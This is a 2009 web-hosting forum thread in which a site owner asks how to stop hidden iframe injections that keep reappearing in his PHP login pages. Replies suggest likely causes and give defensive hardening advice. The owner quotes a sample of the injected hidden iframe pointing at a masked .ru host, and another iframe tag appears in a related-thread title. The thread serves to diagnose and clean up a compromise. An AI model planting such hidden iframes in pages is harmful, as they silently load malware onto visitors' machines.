Results 1 to 11 of 11
Thread: Iframe Virus .ru .cn
-
09-19-2009, 03:57 PM #1WHT Addict
- Join Date
- Aug 2006
- Location
- USA/UK
- Posts
- 112
Iframe Virus .ru .cn
Hey
We are having some issues with one of our web sites, the web site is quite big over 24gigs, to login you need to login via a login script. The site is a lead management site.
Over the last 3 days we have noticed that the login loads with an iframe, after looking at the code i notice there are tons of these iframe viruses in the code like
Code:<div style="display:none"><iframe src="http://xxxxx.ru:8080/index.php" width=666 height=295 ></iframe></div>
How can i stop these viruses coming back each time i clean the pages? I have trried to chmodd to 444 as someone suggested but i am unable to change the files to anything other then 644.
Please help, this is driving me crazy.
Thanks
Martyn“In the midst of chaos, there is also opportunity”
― Sun-Tzu, A Arte da Guerra
-
09-19-2009, 04:04 PM #2Rebooting is a hack, not a fix
- Join Date
- May 2008
- Location
- Citrus Heights, CA
- Posts
- 1,887
http://forums.tizag.com/showthread.php?t=15474
I believe this was discussed here a few times as well.iWebFusion.Net - Shared / Reseller / VPS / Bare Metal / Colocation / IP Transit / Networking
*Simply Hosting - Wholly owned networks, in-house staff, legions of fans!
-
09-19-2009, 05:22 PM #3Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
This can be happening for a variety of reasons.
1.) FTP access
The accounts ftp password could have been obtained or bruteforced. This would allow the attacker to login and modify the account directly.
2.) Rouge Php Script Exploit
One of the scripts on that account, or even on another account could have an exploit which would allow the attacker to inject malicious code to do various things on the server.
3.) PHP Shell
There could be a php shell on the server somewhere from a previous attack. A php shell such as c99 can potentially give the attacker full access to the server via kernel exploits.
It sounds like you need to have the entire server looked at and secured.Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
09-19-2009, 05:52 PM #4Aspiring Evangelist
- Join Date
- Sep 2007
- Posts
- 369
Better secure your server, install modsecurity, change all password as well, also take backup when you clean some site with date on server server, also setup good antivirus to do hourly scan so you come to know which files having problem, regular check your server logwatch, check your /var/log/messages, /var/log/secure, and apache logs, setup proper firewall implementation, turn on iptbles for ougoing ports, for incoming ports open for that when you required, it varies environment to environment. I know its hard initally to implement all this but once you implement all this, you are much much relax, and take a juice of apple then
-
09-19-2009, 06:11 PM #5WHT Addict
- Join Date
- Aug 2006
- Location
- USA/UK
- Posts
- 112
Thanks for the replys guys, really appreciate it.
Im not really experienced with linux, so a server set up with the correct firewalls and security has been overlooked or they are outdated, and i honestly dont trust myself to do it.
Would anyone here be able to point me in the direction of a good server admin that can do a one time set up, and help me eradicate this..
Spent 8 hours today cleaning 4000 files of this code, and we didnt even build this script!
Thanks again
Martyn“In the midst of chaos, there is also opportunity”
― Sun-Tzu, A Arte da Guerra
-
09-19-2009, 06:14 PM #6Web Hosting Master
- Join Date
- Apr 2007
- Location
- United Kingdom
- Posts
- 1,861
Steven from www.rack911.com should be able to do that for you.
-
09-19-2009, 06:15 PM #7WHT Addict
- Join Date
- Jun 2009
- Posts
- 112
Virus attact is mostly to these files:
index.php
main.php
footer.php
index.html
so make sure you clean these files properly or else, virus issue will be there again and change the FTP password. SET IT a very strong pw.
Do include digits, sign and etc..)
And you can also hire someone to do that make a thread in request section !)
-
09-19-2009, 06:18 PM #8WHT Addict
- Join Date
- Aug 2006
- Location
- USA/UK
- Posts
- 112
Hey
Yes that is what we did, after looking over 4000 files the code was in many files not just the index or main files but in sub directories of sub directories.. from 4000 there were 120 or so infected.
I cleaned each, changed the passwords of the FTP and sql, re uploaded.. and then after around 30 minutes it was back in each file i had just cleaned!. So i ended up almost crying! The good part is that i have the cleaned files on my local PC, so i can upload these at will.. but i want to secure the server first and find out where this is coming from as simply reuploading the files is not really working for me.Last edited by M-Vizovi; 09-19-2009 at 06:21 PM.
“In the midst of chaos, there is also opportunity”
― Sun-Tzu, A Arte da Guerra
-
09-19-2009, 06:24 PM #9WHT Addict
- Join Date
- Jun 2009
- Posts
- 112
That sucks really. Very irritating . Hire a professional as soon as possible to do this work!
-
09-19-2009, 08:16 PM #10Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
In the future you may want to scripting a find and replace, that way you can clean up the files with a single command for ALL files. You would still need to clean them up, but that at least helps clean it up quicker.
John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
09-19-2009, 08:30 PM #11WHT Addict
- Join Date
- Aug 2006
- Location
- USA/UK
- Posts
- 112
Hey
We seem to have found the issue, it is the gumbler virus that is hidden in a clients PDF file, as soon as this file is read it activates the infection.
A scripting idea would be awesome, but the url of the virus changes each time its activcvated ie: gxmbler.ru, bxxoxe-life.ru etc i guess we could search "iframe"
Thanks
Martyn“In the midst of chaos, there is also opportunity”
― Sun-Tzu, A Arte da Guerra
Similar Threads
-
unhappyhosting.com / inetintegrity.com/weblog Virus found - HTML/Dldr.Iframe.DP
By ishan in forum Web Hosting LoungeReplies: 8Last Post: 11-29-2008, 03:37 AM -
Help To Prevent From Iframe virus
By rathin in forum Hosting Security and TechnologyReplies: 17Last Post: 06-01-2008, 10:31 AM -
Table's border visible inside iframe with visibility: hidden (set for iframe)
By zoldar in forum Web Design and ContentReplies: 4Last Post: 03-17-2006, 12:58 AM -
<IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
By rychen in forum Hosting Security and TechnologyReplies: 7Last Post: 03-12-2004, 01:29 PM -
Virus Alert: Albanian Virus
By qm8309 in forum Web Hosting LoungeReplies: 6Last Post: 02-06-2004, 10:37 PM